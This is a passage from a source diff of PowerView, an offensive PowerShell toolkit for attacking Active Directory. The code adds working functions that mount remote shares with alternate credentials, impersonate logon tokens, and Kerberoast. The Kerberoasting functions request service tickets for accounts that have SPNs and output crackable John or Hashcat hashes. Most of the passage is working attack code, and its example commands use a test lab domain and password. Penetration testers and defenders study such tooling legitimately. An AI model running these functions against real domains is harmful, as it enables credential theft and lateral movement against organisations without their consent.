+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .EXAMPLE
+.PARAMETER Identity
 
-        PS C:\> Get-Proxy 
-        
-        Returns the current proxy settings.
+A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202),
+or a DOMAIN\username identity.
+
+.PARAMETER Domain
+
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 #>
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True)]
+        [Alias('GroupName', 'GroupIdentity')]
+        [String]
+        $Identity,
+
         [ValidateNotNullOrEmpty()]
         [String]
-        $ComputerName = $ENV:COMPUTERNAME
+        $Domain,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
+    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
+
     try {
-        $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', $ComputerName)
-        $RegKey = $Reg.OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings")
-        $ProxyServer = $RegKey.GetValue('ProxyServer')
-        $AutoConfigURL = $RegKey.GetValue('AutoConfigURL')
+        if ($PSBoundParameters['Domain'] -or ($Identity -match '.+\\.+')) {
+            if ($Identity -match '.+\\.+') {
+                # DOMAIN\groupname
+                $ConvertedIdentity = $Identity | Convert-ADName -OutputType Canonical
+                if ($ConvertedIdentity) {
+                    $ConnectTarget = $ConvertedIdentity.SubString(0, $ConvertedIdentity.IndexOf('/'))
+                    $ObjectIdentity = $Identity.Split('\')[1]
+                    Write-Verbose "[Get-PrincipalContext] Binding to domain '$ConnectTarget'"
+                }
+            }
+            else {
+                $ObjectIdentity = $Identity
+                Write-Verbose "[Get-PrincipalContext] Binding to domain '$Domain'"
+                $ConnectTarget = $Domain
+            }
 
-        $Wpad = ""
-        if($AutoConfigURL -and ($AutoConfigURL -ne "")) {
-            try {
-                $Wpad = (New-Object Net.Webclient).DownloadString($AutoConfigURL)
+            if ($PSBoundParameters['Credential']) {
+                Write-Verbose '[Get-PrincipalContext] Using alternate credentials'
+                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget, $Credential.UserName, $Credential.GetNetworkCredential().Password)
             }
-            catch {
-                Write-Warning "Error connecting to AutoConfigURL : $AutoConfigURL"
+            else {
+                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $ConnectTarget)
             }
         }
-        
-        if($ProxyServer -or $AutoConfigUrl) {
+        else {
+            if ($PSBoundParameters['Credential']) {
+                Write-Verbose '[Get-PrincipalContext] Using alternate credentials'
+                $DomainName = Get-Domain | Select-Object -ExpandProperty Name
+                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $DomainName, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+            }
+            else {
+                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
+            }
+            $ObjectIdentity = $Identity
+        }
+
+        $Out = New-Object PSObject
+        $Out | Add-Member Noteproperty 'Context' $Context
+        $Out | Add-Member Noteproperty 'Identity' $ObjectIdentity
+        $Out
+    }
+    catch {
+        Write-Warning "[Get-PrincipalContext] Error creating binding for object ('$Identity') context : $_"
+    }
+}
+
+
+function Add-RemoteConnection {
+<#
+.SYNOPSIS
+
+Pseudo "mounts" a connection to a remote path using the specified
+credential object, allowing for access of remote resources. If a -Path isn't
+specified, a -ComputerName is required to pseudo-mount IPC$.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
+
+.DESCRIPTION
+
+This function uses WNetAddConnection2W to make a 'temporary' (i.e. not saved) connection
+to the specified remote -Path (\\UNC\share) with the alternate credentials specified in the
+-Credential object. If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
+
+To destroy the connection, use Remove-RemoteConnection with the same specified \\UNC\share path
+or -ComputerName.
+
+.PARAMETER ComputerName
+
+Specifies the system to add a \\ComputerName\IPC$ connection for.
+
+.PARAMETER Path
+
+Specifies the remote \\UNC\path to add the connection for.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+$Cred = Get-Credential
+Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' -Credential $Cred
+
+.EXAMPLE
+
+$Cred = Get-Credential
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection  -Credential $Cred
+#>
+
+    [CmdletBinding(DefaultParameterSetName = 'ComputerName')]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName,
+
+        [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
+        [ValidatePattern('\\\\.*\\.*')]
+        [String[]]
+        $Path,
+
+        [Parameter(Mandatory = $True)]
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential
+    )
 
-            $Properties = @{
-                'ProxyServer' = $ProxyServer
-                'AutoConfigURL' = $AutoConfigURL
-                'Wpad' = $Wpad
+    BEGIN {
+        $NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW)
+        $NetResourceInstance.dwType = 1
+    }
+
+    PROCESS {
+        $Paths = @()
+        if ($PSBoundParameters['ComputerName']) {
+            ForEach ($TargetComputerName in $ComputerName) {
+                $TargetComputerName = $TargetComputerName.Trim('\')
+                $Paths += ,"\\$TargetComputerName\IPC$"
             }
-            
-            New-Object -TypeName PSObject -Property $Properties
         }
         else {
-            Write-Warning "No proxy settings found for $ComputerName"
+            $Paths += ,$Path
+        }
+
+        ForEach ($TargetPath in $Paths) {
+            $NetResourceInstance.lpRemoteName = $TargetPath
+            Write-Verbose "[Add-RemoteConnection] Attempting to mount: $TargetPath"
+
+            # https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx
+            #   CONNECT_TEMPORARY = 4
+            $Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4)
+
+            if ($Result -eq 0) {
+                Write-Verbose "$TargetPath successfully mounted"
+            }
+            else {
+                Throw "[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
+            }
         }
     }
-    catch {
-        Write-Warning "Error enumerating proxy settings for $ComputerName : $_"
+}
+
+
+function Remove-RemoteConnection {
+<#
+.SYNOPSIS
+
+Destroys a connection created by New-RemoteConnection.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
+
+.DESCRIPTION
+
+This function uses WNetCancelConnection2 to destroy a connection created by
+New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to
+'unmount' \\$ComputerName\IPC$.
+
+.PARAMETER ComputerName
+
+Specifies the system to remove a \\ComputerName\IPC$ connection for.
+
+.PARAMETER Path
+
+Specifies the remote \\UNC\path to remove the connection for.
+
+.EXAMPLE
+
+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
+
+.EXAMPLE
+
+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
+
+.EXAMPLE
+
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding(DefaultParameterSetName = 'ComputerName')]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName,
+
+        [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
+        [ValidatePattern('\\\\.*\\.*')]
+        [String[]]
+        $Path
+    )
+
+    PROCESS {
+        $Paths = @()
+        if ($PSBoundParameters['ComputerName']) {
+            ForEach ($TargetComputerName in $ComputerName) {
+                $TargetComputerName = $TargetComputerName.Trim('\')
+                $Paths += ,"\\$TargetComputerName\IPC$"
+            }
+        }
+        else {
+            $Paths += ,$Path
+        }
+
+        ForEach ($TargetPath in $Paths) {
+            Write-Verbose "[Remove-RemoteConnection] Attempting to unmount: $TargetPath"
+            $Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True)
+
+            if ($Result -eq 0) {
+                Write-Verbose "$TargetPath successfully ummounted"
+            }
+            else {
+                Throw "[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
+            }
+        }
     }
 }
 
 
-function Request-SPNTicket {
+function Invoke-UserImpersonation {
 <#
-    .SYNOPSIS
-    
-        Request the kerberos ticket for a specified service principal name (SPN).
-    
-    .PARAMETER SPN
+.SYNOPSIS
+
+Creates a new "runas /netonly" type logon and impersonates the token.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
+
+.DESCRIPTION
 
-        The service principal name to request the ticket for. Required.
-        
-    .PARAMETER EncPart
-        
-        Switch. Return the encrypted portion of the ticket (cipher).
+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
+to simulate "runas /netonly". The resulting token is then impersonated with
+ImpersonateLoggedOnUser() and the token handle is returned for later usage
+with Invoke-RevertToSelf.
 
-    .EXAMPLE
+.PARAMETER Credential
 
-        PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local"
-    
-        Request a kerberos service ticket for the specified SPN.
-        
-    .EXAMPLE
+A [Management.Automation.PSCredential] object with alternate credentials
+to impersonate in the current thread space.
 
-        PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart
-    
-        Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket.
+.PARAMETER TokenHandle
 
-    .EXAMPLE
+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
+is executed.
 
-        PS C:\> "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Request-SPNTicket
+.PARAMETER Quiet
 
-        Request kerberos service tickets for all SPNs passed on the pipeline.
+Suppress any warnings about STA vs MTA.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetUser -SPN | Request-SPNTicket
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
 
-        Request kerberos service tickets for all users with non-null SPNs.
+.OUTPUTS
+
+IntPtr
+
+The TokenHandle result from LogonUser.
+#>
+
+    [OutputType([IntPtr])]
+    [CmdletBinding(DefaultParameterSetName = 'Credential')]
+    Param(
+        [Parameter(Mandatory = $True, ParameterSetName = 'Credential')]
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential,
+
+        [Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')]
+        [ValidateNotNull()]
+        [IntPtr]
+        $TokenHandle,
+
+        [Switch]
+        $Quiet
+    )
+
+    if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) {
+        Write-Warning "[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work."
+    }
+
+    if ($PSBoundParameters['TokenHandle']) {
+        $LogonTokenHandle = $TokenHandle
+    }
+    else {
+        $LogonTokenHandle = [IntPtr]::Zero
+        $NetworkCredential = $Credential.GetNetworkCredential()
+        $UserDomain = $NetworkCredential.Domain
+        $UserName = $NetworkCredential.UserName
+        Write-Warning "[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\$($UserName)"
+
+        # LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3
+        #   this is to simulate "runas.exe /netonly" functionality
+        $Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
+
+        if (-not $Result) {
+            throw "[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+        }
+    }
+
+    # actually impersonate the token from LogonUser()
+    $Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle)
+
+    if (-not $Result) {
+        throw "[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+    }
+
+    Write-Verbose "[Invoke-UserImpersonation] Alternate credentials successfully impersonated"
+    $LogonTokenHandle
+}
+
+
+function Invoke-RevertToSelf {
+<#
+.SYNOPSIS
+
+Reverts any token impersonation.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: PSReflect  
+
+.DESCRIPTION
+
+This function uses RevertToSelf() to revert any impersonated tokens.
+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
+CloseHandle() is used to close the opened handle.
+
+.PARAMETER TokenHandle
+
+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$Token = Invoke-UserImpersonation -Credential $Cred
+Invoke-RevertToSelf -TokenHandle $Token
 #>
 
     [CmdletBinding()]
+    Param(
+        [ValidateNotNull()]
+        [IntPtr]
+        $TokenHandle
+    )
+
+    if ($PSBoundParameters['TokenHandle']) {
+        Write-Warning "[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle"
+        $Result = $Kernel32::CloseHandle($TokenHandle)
+    }
+
+    $Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
+
+    if (-not $Result) {
+        throw "[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+    }
+
+    Write-Verbose "[Invoke-RevertToSelf] Token impersonation successfully reverted"
+}
+
+
+function Get-DomainSPNTicket {
+<#
+.SYNOPSIS
+
+Request the kerberos ticket for a specified service principal name (SPN).
+
+Author: machosec, Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf  
+
+.DESCRIPTION
+
+This function will either take one/more SPN strings, or one/more PowerView.User objects
+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
+portion of the ticket is then extracted and output in either crackable John or Hashcat
+format (deafult of John).
+
+.PARAMETER SPN
+
+Specifies the service principal name to request the ticket for.
+
+.PARAMETER User
+
+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
+
+.PARAMETER OutputFormat
+
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote domain using Invoke-UserImpersonation.
+
+.EXAMPLE
+
+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
+
+Request a kerberos service ticket for the specified SPN.
+
+.EXAMPLE
+
+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
+
+Request kerberos service tickets for all SPNs passed on the pipeline.
+
+.EXAMPLE
+
+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
+
+Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
+
+.INPUTS
+
+String
+
+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
+
+.INPUTS
+
+PowerView.User
+
+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
+
+.OUTPUTS
+
+PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+#>
+
+    [OutputType('PowerView.SPNTicket')]
+    [CmdletBinding(DefaultParameterSetName = 'RawSPN')]
     Param (
-        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)]
+        [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]
+        [ValidatePattern('.*/.*')]
         [Alias('ServicePrincipalName')]
         [String[]]
         $SPN,
-        
-        [Alias('EncryptedPart')]
-        [Switch]
-        $EncPart
+
+        [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]
+        [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]
+        [Object[]]
+        $User,
+
+        [ValidateSet('John', 'Hashcat')]
+        [Alias('Format')]
+        [String]
+        $OutputFormat = 'John',
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    begin {
-        Add-Type -AssemblyName System.IdentityModel
+    BEGIN {
+        $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
+
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
     }
 
-    process {
-        ForEach($UserSPN in $SPN) {
-            Write-Verbose "Requesting ticket for: $UserSPN"
-            if (!$EncPart) {
-                New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+    PROCESS {
+        if ($PSBoundParameters['User']) {
+            $TargetObject = $User
+        }
+        else {
+            $TargetObject = $SPN
+        }
+
+        ForEach ($Object in $TargetObject) {
+            if ($PSBoundParameters['User']) {
+                $UserSPN = $Object.ServicePrincipalName
+                $SamAccountName = $Object.SamAccountName
+                $DistinguishedName = $Object.DistinguishedName
             }
             else {
+                $UserSPN = $Object
+                $SamAccountName = 'UNKNOWN'
+                $DistinguishedName = 'UNKNOWN'
+            }
+
+            # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3
+            if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) {
+                $UserSPN = $UserSPN[0]
+            }
+
+            try {
                 $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+            }
+            catch {
+                Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
+            }
+            if ($Ticket) {
                 $TicketByteStream = $Ticket.GetRequest()
-                if ($TicketByteStream)
-                {
-                    $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-"
-                    [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
-                    $Parts.RemoveAt($Parts.Count - 1)
-                    $Parts -join "A48201"
-                    break
+            }
+            if ($TicketByteStream) {
+                $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
+                [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201'
+                $Parts.RemoveAt($Parts.Count - 1)
+                $Hash = $Parts -join 'A48201'
+                $Hash = $Hash.Insert(32, '$')
+
+                $Out = New-Object PSObject
+                $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName
+                $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName
+                $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName
+
+                if ($OutputFormat -match 'John') {
+                    $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash"
                 }
+                else {
+                    if ($DistinguishedName -ne 'UNKNOWN') {
+                        $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                    }
+                    else {
+                        $UserDomain = 'UNKNOWN'
+                    }
+
+                    # hashcat output format
+                    $HashFormat = "`$krb5tgs`$23`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
+                }
+                $Out | Add-Member Noteproperty 'Hash' $HashFormat
+                $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
+                Write-Output $Out
             }
         }
     }
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
+    }
 }
 
 
-function Get-PathAcl {
+function Invoke-Kerberoast {
 <#
-    .SYNOPSIS
-    
-        Enumerates the ACL for a given file path.
+.SYNOPSIS
+
+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
+
+Author: Will Schroeder (@harmj0y), @machosec  
+License: BSD 3-Clause  
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket  
+
+.DESCRIPTION
+
+Uses Get-DomainUser to query for user accounts with non-null service principle
+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
+The ticket format can be specified with -OutputFormat <John/Hashcat>.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
 
-    .PARAMETER Path
+.PARAMETER LDAPFilter
 
-        The local/remote path to enumerate the ACLs for.
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-    .PARAMETER Recurse
-        
-        If any ACL results are groups, recurse and retrieve user membership.
+.PARAMETER SearchBase
 
-    .EXAMPLE
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        PS C:\> Get-PathAcl "\\SERVER\Share\" 
-        
-        Returns ACLs for the given UNC share.
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER OutputFormat
+
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Invoke-Kerberoast | fl
+
+Kerberoasts all found SPNs for the current domain.
+
+.EXAMPLE
+
+Invoke-Kerberoast -Domain dev.testlab.local -OutputFormat HashCat | fl
+
+Kerberoasts all found SPNs for the testlab.local domain, outputting to HashCat
+format instead of John (the default).
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
+Invoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl
+
+Kerberoasts all found SPNs for the testlab.local domain using alternate credentials.
+
+.OUTPUTS
+
+PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
 #>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.SPNTicket')]
     [CmdletBinding()]
-    param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+        [String[]]
+        $Identity,
+
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Path,
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
         [Switch]
-        $Recurse
+        $Tombstone,
+
+        [ValidateSet('John', 'Hashcat')]
+        [Alias('Format')]
+        [String]
+        $OutputFormat = 'John',
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    begin {
+    BEGIN {
+        $UserSearcherArguments = @{
+            'SPN' = $True
+            'Properties' = 'samaccountname,distinguishedname,serviceprincipalname'
+        }
+        if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
 
-        function Convert-FileRight {
+        if ($PSBoundParameters['Credential']) {
+            $LogonToken = Invoke-UserImpersonation -Credential $Credential
+        }
+    }
+
+    PROCESS {
+        if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }
+        Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat
+    }
+
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
+    }
+}
+
+
+function Get-PathAcl {
+<#
+.SYNOPSIS
+
+Enumerates the ACL for a given file path.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID  
+
+.DESCRIPTION
+
+Enumerates the ACL for a specified file/folder path, and translates
+the access rules for each entry into readable formats. If -Credential is passed,
+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
+
+.PARAMETER Path
+
+Specifies the local or remote path to enumerate the ACLs for.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target path.
+
+.EXAMPLE
+
+Get-PathAcl "\\SERVER\Share\"
+
+Returns ACLs for the given UNC share.
+
+.EXAMPLE
+
+gci .\test.txt | Get-PathAcl
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred
+
+.INPUTS
+
+String
+
+One of more paths to enumerate ACLs for.
+
+.OUTPUTS
 
-            # From http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
+PowerView.FileACL
 
+A custom object with the full path and associated ACL entries.
+
+.LINK
+
+https://support.microsoft.com/en-us/kb/305144
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.FileACL')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('FullName')]
+        [String[]]
+        $Path,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+
+        function Convert-FileRight {
+            # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
             [CmdletBinding()]
-            param(
+            Param(
                 [Int]
                 $FSR
             )
 
             $AccessMask = @{
-              [uint32]'0x80000000' = 'GenericRead'
